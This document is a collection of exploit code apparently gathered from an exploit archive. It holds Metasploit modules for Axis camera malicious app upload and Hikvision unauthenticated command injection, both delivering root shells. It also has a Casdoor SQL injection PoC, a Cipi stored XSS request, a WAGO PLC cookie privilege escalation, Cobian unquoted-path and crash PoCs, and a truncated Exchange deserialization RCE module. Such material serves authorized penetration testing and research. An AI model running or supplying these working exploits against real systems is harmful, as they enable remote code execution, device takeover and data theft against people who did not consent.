<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Axis IP Camera Application Upload',<br /> 'Description' => %q{<br /> This module exploits the "Apps" feature in Axis IP cameras. The feature allows third party<br /> developers to upload and execute 'eap' applications on the device. The system does not validate<br /> the application comes from a trusted source, so a malicious attacker can upload and execute<br /> arbitrary code. The issue has no CVE, although the technique was made public in 2018.<br /><br /> This module uploads and executes stageless meterpreter as `root`. Uploading the application<br /> requires valid credentials. The default administrator credentials used to be `root:root` but<br /> newer firmware versions force users to provide a new password for the `root` user.<br /><br /> The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021).<br /> Although all modules that support the "Apps" feature are presumed to be vulnerable.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'jbaines-r7' # Discovery and Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness'],<br /> [ 'URL', 'https://www.axis.com/support/developer-support/axis-camera-application-platform']<br /> ],<br /> 'DisclosureDate' => '2018-04-12',<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Type' => :linux_dropper,<br /> 'Payload' => {<br /> },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' # Use stagless payloads until issue 16107 gets addressed to fix the ARMLE stager<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80,<br /> 'SSL' => false<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('USERNAME', [true, 'The username to authenticate with', 'root']),<br /> OptString.new('PASSWORD', [true, 'The password to authenticate with', 'root'])<br /> ])<br /> end<br /><br /> # Check function will attempt to verify:<br /> #<br /> # 1. The provided credentials work for authentication<br /> # 2. The remote target is an axis camera<br /> # 3. The applications API exists.<br /> #<br /> def check<br /> # grab the brand/model. Shouldn't require authentication.<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/axis-cgi/prod_brand_info/getbrand.cgi')<br /> })<br /><br /> return CheckCode::Unknown unless res && (res.code == 200)<br /><br /> body_json = res.get_json_document<br /> return CheckCode::Unknown if body_json.empty? || body_json.dig('Brand', 'ProdShortName').nil?<br /><br /> # The brand / model are now known<br /> check_comment = "The target reports itself to be a '#{body_json.dig('Brand', 'ProdShortName')}'."<br /><br /> # check to see if the applications api exists (also tests credentials)<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'uri' => normalize_uri(target_uri.path, '/axis-cgi/applications/list.cgi')<br /> })<br /><br /> # A strange edge case where there is no response... respond detected<br /> return CheckCode::Detected unless res<br /> # Respond safe if credentials fail, to prevent the exploit from running<br /> return CheckCode::Safe('The user provided credentials did not work.') if res.code == 401<br /> # Assume any non-200 means the API doesn't exist<br /> return CheckCode::Safe(check_comment) if res.code != 200<br /><br /> # This checks for an XML response which I'm not sure is smart considering most of the device<br /> # does JSON replies... the concerning being that this response has changed in newer models<br /> return CheckCode::Safe(check_comment) unless res.body.include?('<reply result="ok">') != 200<br /><br /> CheckCode::Appears(check_comment)<br /> end<br /><br /> # Creates a malicious "eap" application. The package application will gain execution<br /> # through the postinstall script. The script, which executes as a systemd oneshot, will<br /> # create and execute a new service for the payload. We have to do this because the oneshot<br /> # child processes will be terminated when the main binary exits. Executing the payload from<br /> # a new service gets around that issue.<br /> #<br /> # The eap registers as a "lua" apptype, because the binary version (armv7hf) gets checked<br /> # for some required libraries whereas the lua version is just accepted.<br /> #<br /> # The construction of the eap follows this pattern:<br /> # * tar -cf exploit payload package.conf postinstall.sh payload.service<br /> # * gzip exploit<br /> # * mv exploit.gz exploit.eap<br /> def create_eap(payload, appname)<br /> print_status("Creating an application package named: #{appname}")<br /> script_name = "#{Rex::Text.rand_text_alpha_lower(3..8)}.sh"<br /><br /> package_conf = "PACKAGENAME='#{Rex::Text.rand_text_alpha(4..14)}'\n" \<br /> "APPTYPE='lua'\n" \<br /> "APPNAME='#{appname}'\n" \<br /> "APPID='48#{Rex::Text.rand_text_numeric(3)}'\n" \<br /> "APPMAJORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \<br /> "APPMINORVERSION='#{Rex::Text.rand_text_numeric(1..2)}'\n" \<br /> "APPMICROVERSION='#{Rex::Text.rand_text_numeric(1..3)}'\n" \<br /> "APPGRP='root'\n" \<br /> "APPUSR='root'\n" \<br /> "POSTINSTALLSCRIPT='#{script_name}'\n" \<br /> "STARTMODE='respawn'\n"<br /><br /> # this sync, sleep, cp, sleep pattern is not optimal, but the underlying<br /> # filesystem was taking time to catch up to the exploit (and mounting and<br /> # unmounting itself which is just weird) and this seemed like a reasonable,<br /> # if not hacky, way to give it a chance to catch up. Seems to work well.<br /> start_service =<br /> "#!/bin/sh\n"\<br /> "\nsync\n"\<br /> "\nsleep 2\n"\<br /> "\ncp ./#{appname}.service /etc/systemd/system/\n" \<br /> "\nsleep 2\n"\<br /> "\nsystemctl start #{appname}\n"<br /><br /> # only register the service file for deletion. Everything else will be<br /> # deleted by the uninstall function called later.<br /> register_file_for_cleanup("/etc/systemd/system/#{appname}.service")<br /><br /> service =<br /> "[Unit]\n"\<br /> "Description=\n"\<br /> "[Service]\n"\<br /> "Type=simple\n"\<br /> "User=root\n"\<br /> "ExecStart=/usr/local/packages/#{appname}/#{appname}\n"\<br /> "\n"\<br /> "[Install]\n"\<br /> "WantedBy=multi-user.target\n"<br /><br /> tarfile = StringIO.new<br /> Rex::Tar::Writer.new tarfile do |tar|<br /> tar.add_file('package.conf', 0o644) do |io|<br /> io.write package_conf<br /> end<br /> tar.add_file(script_name.to_s, 0o755) do |io|<br /> io.write start_service<br /> end<br /> tar.add_file(appname.to_s, 0o755) do |io|<br /> io.write payload<br /> end<br /> tar.add_file("#{appname}.service", 0o644) do |io|<br /> io.write service<br /> end<br /> end<br /> tarfile.rewind<br /> tarfile.close<br /><br /> Rex::Text.gzip(tarfile.string)<br /> end<br /><br /> # Upload the malicious EAP application for a root shell. Always attempt to uninstall the application<br /> def exploit<br /> appname = Rex::Text.rand_text_alpha_lower(3)<br /> eap = create_eap(payload.encoded, appname)<br /><br /> # Instruct the application to install the constructed EAP<br /> multipart_form = Rex::MIME::Message.new<br /> multipart_form.add_part('{"apiVersion":"1.0","method":"install"}', 'application/json', nil, 'form-data; name="data"; filename="blob"')<br /> multipart_form.add_part(eap, 'application/octet-stream', 'binary', "form-data; name=\"fileData\"; filename=\"#{appname}.eap\"")<br /><br /> install_endpoint = normalize_uri(target_uri.path, '/axis-cgi/packagemanager.cgi')<br /> print_status("Sending an application upload request to #{install_endpoint}")<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'uri' => install_endpoint,<br /> 'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",<br /> 'data' => multipart_form.to_s<br /> })<br /><br /> # check for successful installation<br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "HTTP status code is not 200 OK: #{res.code}") unless res.code == 200<br /> body_json = res.get_json_document<br /> fail_with(Failure::UnexpectedReply, 'Missing JSON response') if body_json.empty?<br /> # {"apiVersion"=>"1.4", "method"=>"install", "error"=>{"code"=>60, "message"=>"Failed to install acap"}}<br /> fail_with(Failure::UnexpectedReply, 'The target responded with a JSON error') unless body_json['error'].nil?<br /><br /> # syncing the unstaged meterpreter payload seems to take a little bit for the poor little<br /> # embedded filesystem. Give it a chance to sync up before we try to remove the application.<br /> print_good('Application installed. Pausing 5 seconds to let the filesystem sync.')<br /> sleep(5)<br /> ensure<br /> uninstall_endpoint = normalize_uri(target_uri.path, '/axis-cgi/applications/control.cgi')<br /> print_status("Sending a delete application request to #{uninstall_endpoint}")<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'uri' => uninstall_endpoint,<br /> 'vars_get' => {<br /> 'action' => 'remove',<br /> 'package' => appname.to_s<br /> }<br /> })<br /><br /> # instructions for manually removal if the above fails. That should never happen, but best be safe.<br /> removal_instructions = 'To manually remove the application, log in to the system and then select the apps tab. ' \<br /> "Find the app named '#{appname}' and select it. Click the trash bin icon to uninstall it."<br /><br /> # check for successful removal<br /> print_bad("The server did not respond to the application deletion request. #{removal_instructions}") unless res<br /> print_bad("The server did not respond with 200 OK to the application deletion request. #{removal_instructions}") unless res.code == 200<br /> print_bad("The application deletion response did not contain the expected body. #{removal_instructions}") unless res.body.include?('OK')<br /> print_good("The application #{appname} was successfully removed from the target!")<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Hikvision IP Camera Unauthenticated Command Injection',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection in a variety of Hikvision IP<br /> cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an<br /> HTTP PUT request sent to the `/SDK/webLanguage` endpoint, resulting in command execution<br /> as the `root` user.<br /><br /> This module specifically attempts to exploit the blind variant of the attack. The module<br /> was successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. It<br /> was also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725.<br /> Please see the Hikvision advisory for a full list of affected products.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Watchful_IP', # Vulnerability discovery and disclosure<br /> 'bashis', # Proof of concept<br /> 'jbaines-r7' # Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2021-36260' ],<br /> [ 'URL', 'https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html'],<br /> [ 'URL', 'https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/security-notification-command-injection-vulnerability-in-some-hikvision-products/'],<br /> [ 'URL', 'https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py']<br /> ],<br /> 'DisclosureDate' => '2021-09-18',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_ARMLE],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> # the target has very limited payload targets and a tight payload space.<br /> # bind_busybox_telnetd might be *the only* one.<br /> 'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd',<br /> # saving four bytes of payload space by using 'sh' instead of '/bin/sh'<br /> 'LOGIN_CMD' => 'sh',<br /> 'Space' => 23<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'printf', 'echo' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80,<br /> 'SSL' => false,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> # Check will test two things:<br /> # 1. Is the endpoint a Hikvision camera?<br /> # 2. Does the endpoint respond as expected to exploitation? This module is<br /> # specifically testing for the blind variant of this attack so we key off<br /> # of the returned HTTP status code. The developer's test target responded<br /> # to exploitation with a 500. Notes from bashis' exploit indicates that<br /> # they saw targets respond with 200 as well, so we'll accept that also.<br /> def check<br /> # Hikvision landing page redirects to '/doc/page/login.asp' via JavaScript:<br /> # <script><br /> # window.location.href = "/doc/page/login.asp?_" + (new Date()).getTime();<br /> # </script><br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/')<br /> })<br /> return CheckCode::Unknown("Didn't receive a response from the target.") unless res<br /> return CheckCode::Safe('The target did not respond with a 200 OK') unless res.code == 200<br /> return CheckCode::Safe('The target doesn\'t appear to be a Hikvision device') unless res.body.include?('/doc/page/login.asp?_')<br /><br /> payload = '<xml><language>$(cat /proc/cpuinfo)</language></xml>'<br /> res = send_request_cgi({<br /> 'method' => 'PUT',<br /> 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),<br /> 'data' => payload<br /> })<br /><br /> return CheckCode::Unknown("Didn't receive a response from the target.") unless res<br /> return CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless (res.code == 200 || res.code == 500)<br /><br /> # Some cameras are not vulnerable and still respond 500. We can weed them out by making<br /> # the remote target sleep and use a low timeout. This might not be good for high latency targets<br /> # or for people using Metasploit as a vulnerability scanner... but it's better than flagging all<br /> # 500 responses as vulnerable.<br /> payload = '<xml><language>$(sleep 20)</language></xml>'<br /> res = send_request_cgi({<br /> 'method' => 'PUT',<br /> 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),<br /> 'data' => payload<br /> }, 10)<br /><br /> return CheckCode::Appears('It appears the target executed the provided sleep command.') unless res<br /><br /> CheckCode::Safe('The target did not execute the provided sleep command.')<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # The injection space is very small. The entire snprintf is 0x1f bytes and the<br /> # format string is:<br /> #<br /> # /dav/%s.tar.gz<br /> #<br /> # Which accounts for 12 bytes, leaving only 19 bytes for our payload. Fortunately,<br /> # snprintf will let us reclaim '.tar.gz' so in reality, there are 26 bytes for<br /> # our payload. We need 3 bytes to invoke our injection: $(). Leaving 23 bytes<br /> # for payload. The 'echo' stager has a minium of 26 bytes but we obviously don't<br /> # have that much space. We can steal the extra space from the "random" file name<br /> # and compress ' >> ' to '>>'. That will get us below 23. Squeezing the extra<br /> # bytes will also allow printf stager to do more than 1 byte per exploitation.<br /> cmd = cmd.gsub(%r{tmp/[0-9a-zA-Z]+}, @fname)<br /> cmd = cmd.gsub(/ >/, '>')<br /> cmd = cmd.gsub(/> /, '>')<br /><br /> payload = "<xml><language>$(#{cmd})</language></xml>"<br /> res = send_request_cgi({<br /> 'method' => 'PUT',<br /> 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),<br /> 'data' => payload<br /> })<br /><br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "HTTP status code is not 200 or 500: #{res.code}") unless (res.code == 200 || res.code == 500)<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /><br /> # generate a random value for the tmp file name. See execute_command for details<br /> @fname = "tmp/#{Rex::Text.rand_text_alpha(1)}"<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> # 26 is technically a lie. See `execute_command` for additional insight<br /> execute_cmdstager(linemax: 26)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>// Exploit Title: Casdoor 1.13.0 SQL Injection (Unauthenticated) <br />// Date: 2022-02-25<br />// Exploit Author: Mayank Deshmukh<br />// Vendor Homepage: https://casdoor.org/<br />// Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0<br />// Version: version < 1.13.1<br />// Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r<br />// Tested on: Kali Linux<br />// CVE : CVE-2022-24124<br />// Github POC: https://github.com/ColdFusionX/CVE-2022-24124<br /><br />// Exploit Usage : go run exploit.go -u http://127.0.0.1:8080<br /><br />package main<br /><br />import (<br /> "flag"<br /> "fmt"<br /> "html"<br /> "io/ioutil"<br /> "net/http"<br /> "os"<br /> "regexp"<br /> "strings"<br />)<br /><br />func main() {<br /> var url string<br /> flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")<br /> flag.Parse()<br /><br /> banner := `<br />-=Casdoor SQL Injection (CVE-2022-24124)=- <br />- by Mayank Deshmukh (ColdFusionX)<br /><br />`<br /> fmt.Printf(banner)<br /> fmt.Println("[*] Dumping Database Version")<br /> response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)")<br /><br /> if err != nil {<br /> panic(err)<br /> }<br /><br /> defer response.Body.Close()<br /><br /> databytes, err := ioutil.ReadAll(response.Body)<br /><br /> if err != nil {<br /> panic(err)<br /> }<br /><br /> content := string(databytes)<br /><br /> re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)")<br /><br /> result := re.FindAllString(content, -1)<br /> <br /> sqliop := fmt.Sprint(result)<br /> replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "")<br /> <br /> finalop := replacer.Replace(sqliop)<br /> fmt.Println(html.UnescapeString(finalop))<br /><br /><br /> if result == nil {<br /> fmt.Printf("Application not vulnerable\n")<br /> os.Exit(1)<br /> }<br /><br />}<br /></code></pre>
<pre><code># Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 24.02.2022<br /># Exploit Author: Fikrat Ghuliev (Ghuliev)<br /># Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/><br /># Software Link: https://cipi.sh/ <https://www.aapanel.com/><br /># Version: 3.1.15<br /># Tested on: Ubuntu<br /><br />When the user wants to add a new server on the "Server" panel, in "name"<br />parameter has not had any filtration.<br /><br />POST /api/servers HTTP/1.1<br />Host: IP<br />Content-Length: 102<br />Accept: application/json<br />X-Requested-With: XMLHttpRequest<br />Authorization: Bearer<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36<br />Content-Type: application/json<br />Origin: http://IP<br />Referer: http://IP/servers<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />{<br />"name":"\"><script>alert(1337)</script>",<br />"ip":"10.10.10.10",<br />"provider":"local",<br />"location":"xss test"<br />}<br /><br /></code></pre>
<pre><code># Exploit Title: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation<br /># Date: 02/16/2022<br /># Exploit Author: Momen Eldawakhly (Cyber Guy) at Cypro AB<br /># Vendor Homepage: https://www.wago.com<br /># Version: Firmware version 03.05.10(17)<br /># Tested on: PopOS! [Linux](Firefox)<br /># CVE : CVE-2021-46388<br /><br />========================================<br />= The ordinary user privilege request:<br />========================================<br /><br />GET /wbm/ HTTP/1.1<br />Host: 192.168.1.1<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: close<br />Referer: http://192.168.1.1/wbm/<br />Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22user%22%2C%22roles%22:[%22user%22%2C%22guest%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642368720673%2C%22sessionExists%22:true}<br /><br />==========================================<br />= Manipulated Cookie to Admin Privilege:<br />==========================================<br /><br />GET /wbm/ HTTP/1.1<br />Host: 192.168.1.1<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: close<br />Referer: http://192.168.1.1/wbm/<br />Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22admin%22%2C%22roles%22:[%22admin%22%2C%22admin%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642369499829%2C%22sessionExists%22:true}<br /><br /></code></pre>
<pre><code># Exploit Title: Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-24<br /># Vendor Homepage: https://www.cobiansoft.com/<br /># Software Link : https://files.cobiansoft.com/programs/cbSetup.exe<br /># Tested Version: 11.2.0.582<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Step to discover Unquoted Service Path: <br /><br />C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Gravity " | findstr /i /v """<br /><br /><br />Cobian Backup 11 Gravity CobianBackup11 C:\Program Files (x86)\Cobian Backup 11\cbService.exe Auto<br /><br /><br /># Service info:<br /><br />C:\>sc qc CobianBackup11<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: CobianBackup11<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Cobian Backup 11\cbService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Cobian Backup 11 Gravity<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /></code></pre>
<pre><code># Exploit Title: Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-16<br /># Vendor Homepage: https://www.cobiansoft.com/<br /># Software Link: https://files.cobiansoft.com/programs/cbSetup.exe<br /># Tested Version: 11.2.0.582<br /># Vulnerability Type: Denial of Service (DoS) Local<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Steps to Produce the Crash:<br /># 1.- Run python code: Cobian_Backup_11.2.0.582.py<br /># 2.- Open Cobian_Backup_11.2.0.582.txt and copy content to clipboard<br /># 3.- Open "Cobian Backup 11 Gravity User Interface"<br /># 4.- Task -> "New task"<br /># 5.- File -> Source "Add" -> FTP<br /># 6.- Host -> 10.10.10.10<br /># 7.- Port-> 21<br /># 8.- User name -> admin<br /># 9.- Paste ClipBoard on "Password"<br /># 10.- Ok<br /># 11.- Crashed<br /><br />#!/usr/bin/env python<br /><br />buffer = "\x41" * 800<br />f = open ("Cobian_Backup_11.2.0.582.txt", "w")<br />f.write(buffer)<br />f.close()<br /> <br /></code></pre>
<pre><code># Exploit Title: Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-16<br /># Vendor Homepage: https://www.cobiansoft.com/<br /># Software Link: https://files.cobiansoft.com/programs/crSetup-0.9.93-RC1.exe<br /># Tested Version: 0.9.93 RC1<br /># Vulnerability Type: Denial of Service (DoS) Local<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Steps to Produce the Crash:<br /># 1.- Run python code: Cobian_Reflector_0.9.93_RC1.py<br /># 2.- Open Cobian_Reflector_0.9.93_RC1.txt and copy content to clipboard<br /># 3.- Open "Cobian Reflector User Interface"<br /># 4.- Task -> "New task"<br /># 5.- Files -> Source "Add" -> SFTP<br /># 6.- Host -> 10.10.10.10<br /># 7.- Port-> 22<br /># 8.- User name -> admin<br /># 9.- Paste ClipBoard on "Password"<br /># 10.- Test settings<br /># 11.- Yes<br /># 12.- Crashed<br /><br />#!/usr/bin/env python<br /><br />buffer = "\x41" * 8000<br />f = open ("Cobian_Reflector_0.9.93_RC1.txt", "w")<br />f.write(buffer)<br />f.close()<br /> <br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'nokogiri'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Powershell<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE',<br /> 'Description' => %q{<br /> This vulnerability allows remote attackers to execute arbitrary code<br /> on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11<br /> prior to Security Update 2, Exchange Server 2016 CU21 prior to<br /> Security Update 3, and Exchange Server 2016 CU22 prior to<br /> Security Update 2.<br /><br /> Note that authentication is required to exploit this vulnerability.<br /><br /> The specific flaw exists due to the fact that the deny list for the<br /> ChainedSerializationBinder had a typo whereby an entry was typo'd as<br /> System.Security.ClaimsPrincipal instead of the proper value of<br /> System.Security.Claims.ClaimsPrincipal.<br /><br /> By leveraging this vulnerability, attacks can bypass the<br /> ChainedSerializationBinder's deserialization deny list<br /> and execute code as NT AUTHORITY\SYSTEM.<br /><br /> Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019,<br /> and Exchange Server 2016 CU22 SU0 on Windows Server 2016.<br /> },<br /> 'Author' => [<br /> 'pwnforsp', # Original Bug Discovery<br /> 'zcgonvh', # Of 360 noah lab, Original Bug Discovery<br /> 'Microsoft Threat Intelligence Center', # Discovery of exploitation in the wild<br /> 'Microsoft Security Response Center', # Discovery of exploitation in the wild<br /> 'peterjson', # Writeup<br /> 'testanull', # PoC Exploit<br /> 'Grant Willcox', # Aka tekwizz123. That guy in the back who took the hard work of all the people above and wrote this module :D<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-42321'],<br /> ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321'],<br /> ['URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7'],<br /> ['URL', 'https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169'],<br /> ['URL', 'https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398'],<br /> ['URL', 'https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852']<br /> ],<br /> 'DisclosureDate' => '2021-12-09',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Windows Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_cmd<br /> }<br /> ],<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :win_dropper,<br /> 'DefaultOptions' => {<br /> 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest<br /> }<br /> }<br /> ],<br /> [<br /> 'PowerShell Stager',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :psh_stager<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'HttpClientTimeout' => 5,<br /> 'WfsDelay' => 10<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS, # Can easily log using advice at https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169<br /> CONFIG_CHANGES # Alters the user configuration on the Inbox folder to get the payload to trigger.<br /> ]<br /> }<br /> )<br /> )<br /> register_options([<br /> Opt::RPORT(443),<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> 